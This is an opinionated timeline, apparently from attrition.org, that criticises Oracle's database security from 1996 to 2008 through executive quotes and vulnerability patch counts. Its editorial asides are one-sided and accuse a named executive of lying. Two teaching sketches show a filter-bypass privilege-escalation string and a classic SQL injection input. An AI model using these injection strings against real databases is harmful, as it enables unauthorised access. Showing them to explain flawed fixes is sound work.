A Decade of Oracle Security

[This was originally published on attrition.org]

Oracle Corporation, one of the largest software companies in the world, has been providing database software for 30 years. What began as a relational database funded by a U.S. intelligence agency, designed on a PDP-11 and never officially released, later became perhaps the largest and most prevalent commercial database in the world. With global companies relying on Oracle databases for information management, the need for database security is critical. Despite that need, Oracle products have been plagued with all manner of security vulnerabilities, demonstrating that they were not designed with security in mind. As new versions and new products are released, each is found vulnerable to critical issues that allow trivial denial of service and complete database compromise.

The last decade of Oracle product security has been dismal. In the midst of CEO Larry Ellison’s promises that their database product was ‘unbreakable’ and CSO Mary Ann Davidson’s repeated claims that security is a core facet of their software lifecycle, security researchers continue to find critical remote vulnerabilities in the bulk of their products. The history provided here is meant to make Oracle customers aware of just how little security really matters to Oracle Corporation.

It is past time for Oracle customers to take Davidson’s advice and demand better from their vendors. It is time for them to demand the appointment of a Chief Security Officer who will stop the outright lies and spin-doctoring and turn the company’s attention to the security of future products. Read the executive biography of Mary Ann Davidson and decide whether she is living up to her job duties. “We are not just a really good commercial database but also a very secure commercial database.” — Mary Ann Davidson, 30th anniversary soundbite, April 16, 2007.


1996, March

“On 22 Jun 1995, I reported a “flaw” with Oracle7 […] There have even been a few cases of the “system” password still being “manager” from the install.” — Anonymous [Source]

“It is general – and prudent – security practice not to publish details of security-relevant bugs, in order to protect exposed systems from potential attack. In his rush to expose `backdoors and bugs,’ The unidentified user has irresponsibly put other Oracle7 customers – who may not have had a chance to upgrade – at risk, while his systems are, of course, protected.” — Mary Ann Davidson [Source]

[In February 2002, Ellison claims no one has hacked an Oracle database in the last ten years. If true, why does MAD care about responsible disclosure at all?]

2000, March – December

Oracle releases fixes for 9 security vulnerabilities. [March] [October] [November] [December]

2001, January – October

Oracle releases fixes for 20 security vulnerabilities. [January 1] [January 2] [January 3] [February] [April] [May 1] [May 2] [June 1] [June 2] [June 3] [July] [October 1] [October 2] [October 3] [October 4]

2001, November 13

Larry Ellison claims Oracle Database is “unbreakable”. [Source]

Chairman and CEO Larry Ellison positioned his company’s newest database product as the ultimate e-mail server during his keynote speech Monday night at Comdex and claimed that Oracle 9i is “unbreakable.” Emphasizing the importance of e-mail for enterprise customers, Ellison said Oracle’s database is fault-tolerant and that any application running on Oracle is therefore unbreakable. “The new version of the Oracle database is completely fault-tolerant,” Ellison said. “If the server fails, if the software fails, if the site fails, your application keeps running. It will not go down. You can’t break it.” Ellison also said hackers and cybercriminals can’t break into the database because of its enhanced security and stability. He said he was warned not to call Oracle 9i unbreakable because it would attract hackers eager to break into Oracle databases, but despite increased attacks recently, all attempts have failed so far, Ellison said.

2001, November 15

Mary Ann Davidson testifies before Congress on software security. Some quotes of interest: [Full Transcript]

“I’m Mary Ann Davidson. I’m the Director of Security Product Management for Oracle Corporation. Oracle is the second largest software company in the world, and we are a large provider of secure information management systems to both commercial and governmental customers. A number of our customers are involved in national defense or intelligence activities.”

“Organizations must assess their security requirements and not deviate from them as part of system design. If security is not built into a product or system from the get-go, it is often impossible to retrofit it after-the-fact. Organizations also need to look at the total cost of securing a system, including assessing the lifecycle cost of security, such as how often they will have to patch their systems due to significant security vulnerabilities. While no product is bug-free, an ostensibly secure product, for which a vendor is constantly issuing security patches, is a sign that the vendor did not pay enough attention to security during design, and at some level does not get it, or care about security. More importantly, often the single easiest way hackers break into systems is through public vulnerabilities for which the patch has not been applied. A vendor issuing a patch per day or every other day for their product suite is, in effect, building insecure and unsecurable systems.”

“Consumers of information technology have a requirement to make security a purchasing criteria. I’m sure you’re familiar with the expression that if you don’t vote, you lose the right to complain about the election afterwards. This is also true in security. If you do not make it a purchasing criteria, you lose the right to complain afterwards if you’ve been hacked.”

“Vendors, of course, also have many requirements to provide better cyber security. One of them is to commit to a secure product life cycle; that means everything from building security into your engineering process because you can’t add it after the fact, to being very aggressive in treating security vulnerabilities and notifying a customer base when there are problems in our product suites.”

Ms. Davidson: “Well, I think it’s important that security has to be part of a design process. And a vendor of a secure product has to make a commitment to a secure product lifecycle. For example, before you build a piece of software, you need to sit down and say what are the security threats I’m protecting against? What are the technical measures I’m going to implement?”

Ms. Davidson: “I don’t think you can ever be 100 percent sure and there is no bullet proof security. But it basically gets back to, I talk to my customers about the questions you ought to be asking all of your vendors about security. And that is, how do you build security? Is it part of the design process? Is that one of the first things you think of? Do you have secure coding practices? do you have a small group of people? Because it’s hard to get security right. You have a small group of people who are the experts to whom the rest of your company goes to make sure I’m building a piece of software, I need to make sure the security people; I talk to them, I use the code routines that are well formed and well delivered, I have testing to test the security mechanisms, I do security risk assessments or penetration tests, try to break into it.”

Ms. Davidson: “We have a team of reputable hackers that’s very good at breaking into things before the product goes out the door.”

2001, November 29

Oracle releases fixes for 4 security vulnerabilities. [Source 1] [Source 2]

2001, December 11

Oracle releases fixes for 2 security vulnerabilities. [Source]

2001, December 14

Oracle releases fixes for 1 security vulnerability. [Source]

2001, December 28

Oracle releases fixes for 4 security vulnerabilities. [Source]

[What were you saying about “constantly issuing security patches and the vendor ‘just not getting it'”?]

2002, January 10

“Hackproofing Oracle Application Server” released by NextGen, disclosing multiple vulnerabilities and giving the first practical Oracle hardening guide. [Source]

2002, February 6

Oracle releases fixes for 20 security vulnerabilities. [Source 1] [Source 2]

2002, February 7

Mary Ann Davidson weakly defends Ellison’s comment about Oracle being “unbreakable”. [Source]

However, Oracle’s Chief Security Officer Mary Ann Davidson took exception with any characterisation that the company hasn’t delivered on its promise to create “unbreakable” software. “We are doing a heck of a lot,” she said. “I would much rather stand up and say we are going to make every product unbreakable than to say, ‘you’re right, it’s impossible,’ and give up.” “Marketing campaigns come and go,” said Oracle’s Davidson, “but we are in security for the long haul.”

[“Heck of a lot?” Flashbacks to Michael ‘Brownie’ Brown and we know where he ended up.]

2002, February 26

Larry Ellison says that Oracle Databases have not been hacked in the last 10 years. [Source]

LARRY ELLISON: Do you know how many people have hacked into an Oracle database in the last ten years?

SPENCER MICHELS: No.

LARRY ELLISON: That would be zero. That would be zero. It is not true that anyone can hack into any piece of software.

2002, March 5

Oracle releases fixes for 1 security vulnerability. [Source]

2002, March 5

Mary Ann Davidson writes a letter to The Register after Thomas Greene takes Oracle to task over vulnerabilities. In her letter she begins the process of redefining what “unbreakable” means, setting herself up for embarrassment when Oracle later becomes hostile toward vulnerability researchers and makes the same mistakes over and over. [Source]

Our customers are among the most security-aware in the world; it is precisely because we market that we are secure that we take great pains to notify customers of security vulnerabilities when we – or others – find them. It’s very simple; you do the right thing by customers. We run our own systems on Oracle, so the security golden rule of ‘treating the customer as you would yourself’ is especially applicable.

It’s easy to criticize vendors for security vulnerabilities, but the target is all too easy to hit. A better approach might be to look at a vendor’s track record: we have spent millions on information assurance – having someone other than Oracle vet our security claims – through 14 independent security evaluations, far more than any other vendor. We have a secure product development process which we continuously strive to improve. Unlike many vendors, we do not blame the researcher for finding security issues in our products; rather, we give attribution to them, and make every effort to address the issue for all customers, on all releases, as quickly as possible, a feat particularly challenging for us given the number of product releases and operating systems we support. We use “vulnerability lessons learned” to continuously improve our development processes, our default installation and/or our documentation.

Our long-standing commitment to secure product design, development and delivery and independent measures of assurance is what ‘Unbreakable’ is all about. Long after the marketing campaign is done, we will still be fanatical about providing the most secure mission-critical software in the business.

2002, April

Oracle releases fixes for 4 security vulnerabilities. [Source 1] [Source 2] [Source 3]

2002, June 5

Oracle releases fixes for 2 security vulnerabilities. [Source 1] [Source 2]

2002, August

Oracle releases fixes for 7 security vulnerabilities. [Source 1] [Source 2] [Source 3] [Source 4]

2002, October

Oracle releases fixes for 8 security vulnerabilities. [Source 1] [Source 2] [Source 3] [Source 4] [Source 5] [Source 6]

2002, November 14

Ellison claims to have invited hackers from evil hacker-laden countries to test Oracle, and not a one could break in. He takes more shots at Microsoft for poor security, all the while ignoring Oracle’s own growing history of insecurity. [Source]

Ellison claimed it’s been more than 10 years since someone has hacked into an Oracle database. Oracle invited the toughest hackers from China, Russia and all over the world to break into Oracle’s system when it launched its “Unbreakable” advertising campaign last year, he said. Though hacking attempts on Oracle’s Web site shot up to as many as 30,000 attacks per week during the campaign, no one managed to break into the system, Ellison said.

“Bill Gates said he would devote the month of February to security,” said Ellison, referring to an initiative at Microsoft earlier this year to improve the security of its software. “February’s a short month. We’ve devoted 25 years to security.”

2002, October 31

Oracle releases fixes for 1 security vulnerability. [Source]

2002, December

Oracle releases fixes for 4 security vulnerabilities. [Source 1] [Source 2]

2003, February 11

Oracle releases fixes for 6 security vulnerabilities. [Source 1] [Source 2] [Source 3] [Source 4] [Source 5]

2003, March 3

Oracle releases fixes for 1 security vulnerability. [Source]

2003, April

Oracle releases fixes for 2 security vulnerabilities. [Source 1] [Source 2]

2003, May 29

BusinessWeek writes a flattering story about Mary Ann Davidson and Oracle that seems to contradict her own accounts at other times; she has said that when she first heard the slogan “unbreakable”, she thought “What idiot dreamed this up?”. [Source]

Just so there’s no misunderstanding about who to look up should something go wrong, Davidson’s job starts with software development, where the task is to create a hacker-proof design, and ends with security response — containing the damage if any occurs.

Though Davidson didn’t have a programming background, she compensated with big-picture, strategic thinking. When Oracle’s marketing team and Ellison came up with the “unbreakable” slogan, she mobilized her staff to raise the security bar. That entailed closely examining many products and changing the way programming code was built and planned. Davidson often asks the thorny security questions that software developers prefer not to answer, such as: Who should get privileges to see data? How can a software product guarantee that only the right people get that access? And how should products be built to both preserve security and accommodate government demands to see information on an emergency or surveillance basis?

2003, July 23

Oracle releases fixes for 3 security vulnerabilities. [Source 1] [Source 2] [Source 3]

2003, August 18

Oracle releases fixes for 3 security vulnerabilities. [Source]

2003, September 10

Mary Ann Davidson, the chief security officer at Oracle Corporation, stands behind Oracle’s commitment to develop the industry’s most secure database, application server and enterprise software products for its customers. Davidson, who has been at Oracle for more than 14 years, believes that security must be a design and development priority, not an afterthought, because “it’s impossible to bolt down security that is not built into the product.” She sees Oracle’s security ‘culture’ as a key corporate strategy and competitive advantage in the software industry. [Source]

2003, October

Oracle releases fixes for 3 security vulnerabilities. [Source 1] [Source 2]

2003, November 3

Oracle releases fixes for 1 security vulnerability. [Source]

2004, February 18

Oracle releases fixes for 2 security vulnerabilities. [Source 1] [Source 2]

2004, March 12

Oracle releases fixes for 2 security vulnerabilities. [Source]

2004, May 6

Mary Ann Davidson tells us about the cost of patching. Too bad she doesn’t carry it to the next step and multiply by the number of patches Oracle releases and the number of customers or installations. [Source]

“For example, the estimated cost to deploy a patch for a recognized software flaw runs on average $900 per server and $700 per client. If an organization misses a patch and gets hit by a virus, the cost will be magnified.” — Mary Ann Davidson

2004, June 3

Oracle releases fixes for 2 security vulnerabilities. [Source]

2004, June 4

Oracle releases fixes for 1 security vulnerability. [Source]

2004, August 31

Oracle releases fixes for 35 security vulnerabilities. [Source]

2005, January 6

David Litchfield, responsible for finding dozens of vulnerabilities in Oracle products, finally gets tired of Oracle dragging their feet when producing patches. After Alert 68 is released to fix vulnerabilities, he discovers that many are incredibly pathetic attempts at fixes that can trivially be bypassed and offer no real solution to the problem or protection from attack. Litchfield posts to Bugtraq describing the patch problems and expressing his frustration that Oracle took eight months to produce such shoddy patches. His post is titled “Opinion: Complete failure of Oracle security response and utter neglect of their responsibility to their customers” [Source]

The real problem with this is not that the flaws Alert 68 supposedly fixed are still exploitable, but rather the approach Oracle took in attempting to fix these issues. One would expect that, given the length of time they took to deliver, these security “fixes” would be well considered and robust; fixes that actually resolve the security holes. The truth of the matter though is that this is not the case.

Some of Oracle’s “fixes” simply attempt to stop the example exploits I sent them for reproduction purposes. In other words, the actual flaw was not addressed, and with a slight modification to the exploit it works again. This shows a slapdash approach with no real consideration for fixing the actual problem itself.

As an example of this, Alert 68 attempts to fix some security holes in some triggers; the flaws could allow a low privileged user to gain SYS privileges – in other words gain full control of the database server. The example exploit I sent to Oracle contained a space in it. Oracle’s fix was to ignore the user’s request if the input had a space. What Oracle somehow failed to see or grasp was that no space is needed in the exploit. This fix suggests no more than a few minutes of thought was given to the matter. Why did it take 8 months for this? Further, how on earth did this get through QA? More, why are we still waiting for a proper fix for this?
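
To illustrate the class of mistake Litchfield describes, consider a minimal sketch (hypothetical code, not Oracle’s actual patch logic). Because Oracle SQL treats an inline comment as whitespace, a filter that rejects input containing a literal space blocks only the sample exploit, not the underlying flaw:

    # A blacklist "fix" of the kind Litchfield describes (hypothetical):
    def naive_filter(user_input):
        """Reject any request whose input contains a space."""
        return " " not in user_input

    # The example exploit sent to Oracle contained a space:
    assert not naive_filter("GRANT DBA TO PUBLIC")        # blocked

    # Oracle SQL accepts an inline comment wherever whitespace is legal,
    # so replacing every space with /**/ restores the attack:
    assert naive_filter("GRANT/**/DBA/**/TO/**/PUBLIC")   # sails through

    # The injectable code itself is untouched; only one literal byte of
    # one sample exploit was filtered.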

2005, January 18

Oracle releases fixes for 25 security vulnerabilities and announces a move to a quarterly Critical Patch Update cycle, releasing security fixes roughly every three months. [Source 1] [Source 2]

2005, January/February

Mary Ann Davidson begins the blame game, citing security researchers as a problem equal to that of vendors. She also reminds us that U.S. intelligence agencies rely on Oracle software, meaning the nation’s intelligence data is housed on extremely vulnerable products. [Source]

“I admit: We vendors need to do better in building secure software. We try. I try everything I possibly can. But I don’t buy the argument that it’s all the vendors’ fault for not building better software, in cases where researchers happily hand weapons of mass disruption to the hacking community.”

“When you look at the amount of money spent fixing avoidable, preventable security faults, you realize that almost anything that can be done upfront to avoid making those mistakes pays for itself quickly. There is a strong cost-avoidance argument to building software right the first time.”

“Oracle has a rather strong culture of security, partly because we started as a company nearly thirty years ago by building the first commercial relational database, under contract to a U.S. intelligence agency.”

2005, April 24

Oracle releases fixes for 69 security vulnerabilities in their first quarterly patch. [Source]

2005, May 24

Mary Ann Davidson keeps reminding us that customers should press their vendors for secure software. Fortunately for Oracle, their customers clearly don’t follow her advice. [Source]

As chief security officer (CSO) at software vendor Oracle, Davidson is in charge of making sure that customers’ data stays safe. Even if you’re not one of Oracle’s customers, who include critical infrastructure providers in the government, financial services, and telecommunications sectors, it’s possible that some of your data is being stored in Oracle software.

IDGNS: What other advice do you have for customers on security?

Davidson: Push your vendor to tell you how they build their software and ask them if they train people on secure coding practices. Also, push industry analysts on which products are more secure. Analysts tend to not do direct product comparisons but I think they should do it on security products based on the total cost of ownership. For example, ask which product is going to cost more from a security standpoint, ask how many patches am I going to have to apply, and how many consultants am I going to have to hire to lock it down.

2005, July 12

Oracle releases fixes for 55 security vulnerabilities, 11 of which are silent fixes, showing that they are not entirely open about vulnerabilities. [Source]

2005, September 16

A problem with “one of 100 issues”? Read back to January and the problem seems rather more prevalent. [Source]

Speaking with eWEEK Magazine, Oracle CSO Mary Ann Davidson admitted that the company had a problem with one of 100 issues that it fixed in its most recent quarterly Critical Patch Update (CPU).

Davidson admitted that the company did not adequately check to make sure that the patch components were installed correctly on Oracle systems where the patch was applied.

2005, October 18

Oracle releases fixes for 90 security vulnerabilities. [Source]

2005, December 21

Pete Finnigan notices that Mary Ann Davidson has announced (and thus endorsed) that Fortify software will be used to audit Oracle software for vulnerabilities. Below are Pete’s comments on how ineffective this will be. Three years later, the number of vulnerabilities doesn’t seem to be going down at all. This is the power of fluffy partnerships made for their own sake, not for any real value (to Oracle, at least). [Source]

I saw today that Mary Ann Davidson has announced that Fortify Software Inc’s products will be used to check the database server software and middleware for potential security holes. I saw this in a post titled “Oracle Turns to Fortify to Secure Source Code”. In this post Mary Ann says she has searched for years for a suitable tool to audit the Oracle software. There is a sting in the tail though, as Fortify’s software is not suitable for auditing large swathes of the Oracle product stack such as the application server, E-Business Suite, Peoplesoft and many more that are written in a variety of languages; presumably PL/SQL is one of those that are not supported. It sounds from this article that the C used for the server will be audited but PL/SQL will not. As most of the recent SQL injection issues, and therefore security bugs, are in PL/SQL packages, this new tool is unlikely to make large inroads into the recent woes caused by these bugs.

2006, January 12

Less than a month later, Pete Finnigan is proven right. Fortify fails to find many vulnerabilities. Instead, the tools turn up a high rate of false positives and prove unable to find what security researchers are finding. [Source]

Why Oracle changed its mind is a long story. But the straw that broke the camel’s back came in November. It came in the form of a report from security researcher Alexander Kornbrust, of Red-Database-Security GmbH, which stated that Kornbrust had found some 252 unpatched holes in Oracle Database 10g.

Oracle does have a lot of resources, but vetting 252 reported vulnerabilities isn’t where its people want to devote them. As it is, the automated code assessment tools Oracle uses tend to turn up false positives, John Heimann, director of Oracle’s security program management, told eWEEK.

2006, January 17

Oracle releases fixes for 89 security vulnerabilities. [Source]

2006, April 19

Oracle releases fixes for 37 security vulnerabilities. [Source]

2006, April 27

Oops? Oracle forgot to patch a critical hole, leaving their customers vulnerable to public exploits. [Source]

Last week, the business software maker issued its quarterly Critical Patch Update, addressing more than 30 flaws in its software. However, the update for Oracle 10g Release 2 does not plug a hole that allows published attack code to run, according to a message sent to the Full Disclosure security list on Wednesday by David Litchfield, a researcher at Next Generation Security Software.

2006, May 1

Mary Ann Davidson claims that 75% of all security bugs are found by Oracle’s security team. Alexander Kornbrust decides to use Davidson’s math against her to show just how bad Oracle products really are. Remember, Mary Ann, all of those vulnerabilities supposedly found by your team are potential risks to your customers before they are found and fixed. [Source]

Last year, Oracle’s chief security officer Mary Ann Davidson claimed that Oracle’s own researchers found 75 percent of the bugs in the company’s products. Kornbrust used Davidson’s figure to project that Oracle actually had 160 flaws it needed to fix.

“Let’s do some math,” wrote Kornbrust on Bugtraq. “According to Mary Ann Davidson, 75% of all security bugs are found by Oracle employees. If bugs are fixed independently of the reporter, then: 25% = 40 unfixed bugs (found by Red-Database-Security); 75% = 120 unfixed bugs (found by Oracle employees) ==> 160 security bugs are still unfixed.”

2006, May 25

Mary Ann Davidson tells us that band-aids are a waste of resources, yet year after year Oracle proves that band-aids are the only solution it has available. [Source]

“I don’t hate protecting our customers, that’s important, but what a waste of resources to try to band-aid after the fact something we should have caught earlier,” she said.

As a result, Oracle has implemented numerous measures to produce better code. Oracle created a 200-page guide on coding standards. An in-house hacking team pokes products for holes in live hacking sessions. Developers up to senior vice presidents must participate in educational Web-based classes.

“We use our own dumb-ass mistakes as examples,” Davidson said. “Because if you don’t do that, developers think this is an academic argument.”

The company uses new in-house tools to look for buffer overflow vulnerabilities and SQL injection attacks. It also employs software from Fortify Software to scan for problems in Oracle’s 30 million lines of code, she said.

“My goal is to be out of a job,” Davidson said.

2006, May 29

Oracle’s security chief says the software industry is so riddled with buggy product makers that “you wouldn’t get on a plane built by software developers.” Personally, I wouldn’t get on an Oracle brand bicycle or use an Oracle brand toaster. [Source]

Chief security officer Mary Ann Davidson has hit out at an industry in which “most software people are not trained to think in terms of safety, security and reliability.” Instead, they are wedded to a culture of “patch, patch, patch,” at a cost to businesses of US$59 billion, she said.

2006, May 29

Mary Ann Davidson proves beyond doubt that she is a token figurehead at Oracle, put there for spin-control and little else. [Source]

There is often little upside to cooperating with companies that do not understand Oracle and who profit from publishing security vulnerabilities, according to Oracle Chief Security Officer Mary Ann Davidson.

“What I really want is a world where there can be fair and accurate criticisms,” she said. “I’m all for dialogue, but you have to establish trust.”

[As this timeline shows, there is little reason to trust Oracle products, Ellison or Davidson. They are clearly not interested in customer security.]

And Oracle no longer talks about its products as unbreakable. Earlier this week, Davidson said that the first time she heard the marketing slogan, she thought, “What idiot dreamed this up?”

Davidson believes that Oracle and Microsoft have very different pedigrees when it comes to security. She says that security has been built into the development of Oracle’s products for years now, a by-product of its long history of government use. The U.S. Central Intelligence Agency was one of Oracle’s first customers, she noted.

Oracle’s security team doesn’t simply fix bugs. When a new flaw is discovered, researchers make sure that what they’ve learned also translates into secure coding practices for the development team. “For at least 12 years we have built security into the formal development process,” Davidson said.

[Yes, this amazing security pedigree, secure coding practices and security development process are abundantly clear. When Davidson says all of this with a straight face, it demonstrates that her position is that of a liar, not someone genuinely interested in improving product security.]

2006, July 18

Oracle releases fixes for 65 security vulnerabilities. [Source]

2006, October 17

Oracle releases fixes for 101 security vulnerabilities. [Source]

2007, January/February

“This leads me to the very last reason but really the first reason why we did what we did for Oracle Database XE: Oracle’s name is on it, and security is part of everything we do.” — Mary Ann Davidson [Source]

2007, January 16

Oracle releases fixes for 51 security vulnerabilities. [Source]

2007, March/April

Mary Ann Davidson writes in Oracle Magazine, citing an example of how Oracle customers asked for identity management solutions centered around a “really scalable LDAP directory”. Despite all of the lessons learned, the security development life cycle and their own ethical hacking team, it didn’t take long for vulnerabilities to surface. Of course, any claim that the vulnerabilities were due to portions of the technology being acquired can be put to rest when we see that Oracle’s LDAP solutions had vulnerabilities as far back as July 2001. [Source]

“Oracle, for example, got into identity management when customers asked us to build a really scalable LDAP directory, and we have made several acquisitions in identity management for the purpose of offering a complete, integrated, and heterogeneous solution.” — Mary Ann Davidson

2007, April 17

Oracle releases fixes for 36 security vulnerabilities. [Source]

2007, May/June

Mary Ann Davidson writes about all the great work Oracle is doing with transparent data encryption and privilege separation, all the while using their search technology to find stuff. In essence, she is telling Oracle customers that they can use more Oracle products to make their lives easier. And less secure. [Source]

“One of our key database security product features is definitely Transparent Data Encryption, encryption that is just there and works, without requiring you to recode your application. (Encrypting data in an operational database transparently to an application is not all that easy, or we’d have done it a long time ago.) We can encrypt backups, too, by using Oracle Secure Backup, and given the amount of sensitive information stored off-site in backups, that’s a great thing. Just ask any company whose unencrypted backup tapes of all their customer data have gone missing. We have also started tackling that perennial “other hard security problem” of the godlike-privileged DBA by enabling customers to separate database administration from data access in the administered database by using Oracle Database Vault. And, last but not least, with Oracle Secure Enterprise Search we provide the ability to harness the power of all your data in disparate places across your enterprise through a powerful search engine, while limiting (in some cases, for security reasons) people from even knowing that a document exists. I confess that, for someone who works at a tech company, I am a closet Luddite, but database security is definitely cool again.

I’m glad that a lot of great folks at Oracle are making data security just that simple. I think our customers, and their customers, will be glad too.” — Mary Ann Davidson

2007, May 23

Mary Ann Davidson begins a new campaign of spin-control, trying to justify Oracle product insecurity by arguing that since Oracle used tools to try to find bugs during the software development lifecycle, the company had good intentions, and that somehow makes it acceptable when someone compromises your entire database and publishes your customer information. Even then, using shoddy tools that clearly aren’t adequate for the task doesn’t mean Oracle paid attention; it means Oracle wasted huge portions of its security budget. [Source]

“Maybe you can’t prove that this product is free of defects but at least prove to me that you use these [tools] in its development. You are going to have to have some kind of proof that you paid attention in development — even to the level of training people and what kind of software lifecycle you have,” said Davidson.

2007, July 17

Oracle releases fixes for 45 security vulnerabilities. [Source]

2007, August 14

On her new blog, Mary Ann Davidson tries to convince us that many vendors, especially Oracle, have more secure products rolling out and that newer products are more secure because of the lessons they learned. Over the next year, new Oracle products are found to be vulnerable to the same classes of vulnerabilities that have plagued their products for 25 years. [Source]

“Where does this leave us? With a speed bump that says, in effect, newer versions of products — almost any vendor’s products — are probably, all other things being equal, “more secure.” This seems obvious, but it is worth stating. Vendors — most of us — know more about secure development and secure coding than we did even three or four years ago. Newer products reflect that. Also, even if we can’t fix every single security issue on old product versions, we certainly are going to fix it in new versions. Preferably, as soon as we can because it is just good business and common sense to do this.” — Mary Ann Davidson

2007, October 8

Oracle’s SSA program (new acronym, same spin) supposedly uses multiple tools to find and eliminate vulnerabilities before products ship. One has to wonder just how bug-ridden their software is if they are having success with these tools and researchers are still finding sometimes hundreds of vulnerabilities a quarter. [Source]

“The main value of automated vulnerability assessment tools is finding and fixing problems during development, before products ship. Also, automated vulnerability assessment tools are just one component of a robust, comprehensive assurance program. Oracle uses multiple tools as part of its Software Security Assurance program.” — Mary Ann Davidson

2007, September/October

[Source]

“Oracle is celebrating its 30th anniversary this year. Some of us old-timers have been busy wallowing in nostalgia by cataloging remembrances of how Oracle has changed over these 30 years.” — Mary Ann Davidson

[Some of us old-timers have been busy cataloging over 1,080 vulnerabilities in Oracle.]

“Oracle has some homegrown tools we use to help find and root out common secure-coding errors. Some of these have been developed by Oracle’s ethical hacking team, whose technical acumen is exceeded only by its sense of humor in naming the tools. (SQL*Splat is a tool for finding SQL injections, and Bit*Rotter is a protocol fuzzer.) The ethical hacking team uses these tools to automate its security assessments, and the quality assurance teams use them to keep ahead of the ethical hackers.

It took us a long time to find good tools, train people to use them, and roll them out. We have helped our vendors make their tools more robust (nobody could scan 50 million lines of code daily when we started looking at tools), which helps not only Oracle but also others in the industry.” — Mary Ann Davidson

[If the names SQL*Splat and Bit*Rotter reflect a sense of humor that exceeds the team’s technical acumen, it may explain why Oracle’s ethical hacking team misses so many vulnerabilities subsequently found by third parties.]

2007, October 16

Oracle releases fixes for 51 security vulnerabilities. [Source]

2007, October 17

“I don’t know if it’s my Midwestern upbringing or going to a university with a very strong honor code, but I am really big on disclosure.

Disclosure forces you to be honest with yourself as well as other people. If you have an axe to grind about something, you need to disclose who sharpens your axe if it is material to the discussion. And it often is.” — Mary Ann Davidson [Source]

[“Disclosure.. honesty.. you keep using these words. I do not think they mean what you think they mean.”]

2007, November/December

One or two months after vulnerabilities were disclosed in Oracle Vault products, Mary Ann Davidson says they were released when ready for the market. [Source]

“What also strikes me about the Oracle Database 11g launch: the option and product releases before the launch. Oracle has released a number of innovative database security options, products, and features over the last two years, including Oracle Database Vault and Oracle Audit Vault. These two offerings were so important that Oracle did not wait for the Oracle Database 11g release; instead, Oracle shipped them when they were ready for market.” — Mary Ann Davidson

2008, January 15

Oracle releases fixes for 26 security vulnerabilities. [Source]

2008, January/February

Again, new technology touted by Oracle and almost immediately found vulnerable. [Source]

“Inside the enterprise, search engines need to be smart and choosy: they must help people find what they need, without allowing them to snoop for what they aren’t supposed to have. Oracle Secure Enterprise Search was built to be a “better mousetrap”: an intelligent, security-aware search engine.” — Mary Ann Davidson

2008, February 18

Mary Ann Davidson tells us of Oracle offering a class on defending against SQL injection attacks. Since it is the product that must sanitize user-supplied input, the vendor is the best candidate to take this class. I guess with their track record, they have to rely on defense-in-depth more than anyone. Hopefully, every single programmer at Oracle is required to take it. [Source]

“An important objective of Oracle Software Security Assurance is that we provide information to customers that helps enable them to use our products securely. To this end, we have developed training materials titled “Defending Against SQL Injection Attacks.” Available now, this training content is available online and can also be downloaded so that offline studying (while in the train for your morning commute) is possible. “Defending Against SQL Injection Attacks” highlights some of the coding practices required to eliminate SQL injection vulnerabilities when developing in an Oracle environment. Oracle recommends that anyone who develops Internet applications that access an Oracle database review these materials. Note that this tutorial will also be available through Oracle University as a lesson in the instructor-led course “Oracle Database 11g: Advanced PL/SQL”, which is scheduled to be available in April 2008.” — Mary Ann Davidson
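
For reference, the core lesson such training teaches is simple: never build SQL by concatenating client-supplied strings; use bind variables. A minimal sketch in Python, using the standard library’s sqlite3 purely so the example is self-contained (the same bind-variable pattern applies when developing against an Oracle database):

    import sqlite3

    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, owner TEXT)")
    conn.execute("INSERT INTO accounts VALUES (1, 'alice')")

    hostile = "alice' OR '1'='1"   # classic injection string

    # Vulnerable: concatenation lets the input rewrite the query itself.
    unsafe = "SELECT id FROM accounts WHERE owner = '" + hostile + "'"
    print(conn.execute(unsafe).fetchall())            # [(1,)] -- injected

    # Safe: a bind variable keeps the input as data, never as SQL.
    safe = "SELECT id FROM accounts WHERE owner = ?"
    print(conn.execute(safe, (hostile,)).fetchall())  # [] -- no match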

2008, March 6

“Forthwith, here is my script for parsing through shill-meisters as quickly as possible:

5. “How can it be broken?” (Especially for a security product, knowing and being honest about how it can be broken is important. A claim of “zero false positives,” for example, should cause anyone to run screaming in the opposite direction.) (like ‘unbreakable’?)”

[Yes, exactly like “unbreakable”. Perhaps Oracle customers should heed your advice.]

“As much as I have expressed concerns about every idiot with an opinion being able to express it on the Internet (as I am doing here!), the fact remains that in some cases, bloggers have spotted untruths, exaggerations and fabrications reported by the media (doctored pictures and doctored service records, to think of a couple of prominent examples). There is an important utility in keeping professional journalists and industry analysts honest and objective that is worth something to the millions of people who expect that from mainstream media. Score one for the blogosphere.

I talked in my presentation about what constitutes a good metric (objective, measurable, helps you answer basic questions like “are we doing better or worse,” incents the right behavior, fosters additional questions, helps you identify positive or negative trends, and so on). I used as an example the various metrics we keep pertaining to the release of CPUs that I wanted to discuss as a group, because there is no single metric that you could use to answer “goodness questions” related to how we are doing. In fact, picking a single metric and focusing on it to the exclusion of all others would lead to incorrect incentives.” — Mary Ann Davidson [Source]

[Primarily because none of the metrics suggest Oracle is doing better.]

2008, April 4

Davidson is “keenly aware” of the costs to Oracle customers, yet history shows she has done little to prevent it. [Source]

“As such, I am keenly aware of the high costs to Oracle and to our customers of avoidable, preventable defects in our software.” — Mary Ann Davidson

2008, April 8

Mary Ann Davidson blogs about the growing problem of hiring qualified programmers that have been trained to code with security in mind. This begins a new trend of blame-shifting, suggesting that universities are to blame for vulnerabilities, as they do not properly teach computer science students. [Source]

“In the vendor community, there is a low rumble of discontent about our supply chain’s current lack of a “secure development lifecycle.” I’m not talking about other software suppliers (for example, vendors who supply toolkits or components we embed) though at Oracle, we do vet these suppliers’ security practices before we incorporate their technologies into our code.

While I appreciate the University of X’s CS department chairman getting back to me (and the fact that they had at least some material on secure coding practice), I see no reason to pay them to do work they should be doing, anyway.

Take my letter, modify it as you will, and start holding university CS programs’ feet to the fire to improve.” — Mary Ann Davidson

2008, April 15

Oracle releases fixes for 41 security vulnerabilities. [Source]

2008, May

As of May 2008, there is no real statistical evidence to show that Oracle security is improving. Despite the continued promises from Davidson and Oracle, security standards, a security development life cycle, learning from past mistakes and other sound bites are doing nothing to produce secure products.

2008, May/June

Using standard modules in software can be beneficial. However, the programmers who wrote those modules weren’t properly trained in secure coding practices, which results in a mess. Worse, watching Mary Ann Davidson parrot the maxim of “don’t trust client input” is laughable given the sheer number of cross-site scripting and SQL injection vulnerabilities that plague Oracle products. [Source]

“For example, for many years, Oracle has had its developers use standard cryptographic modules.” — Mary Ann Davidson

Oracle believes that most developers should be writing “Secure code,” not “security code.”

A second caution is to remember information security Rule No. 1: “Don’t trust any information from the client.”
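
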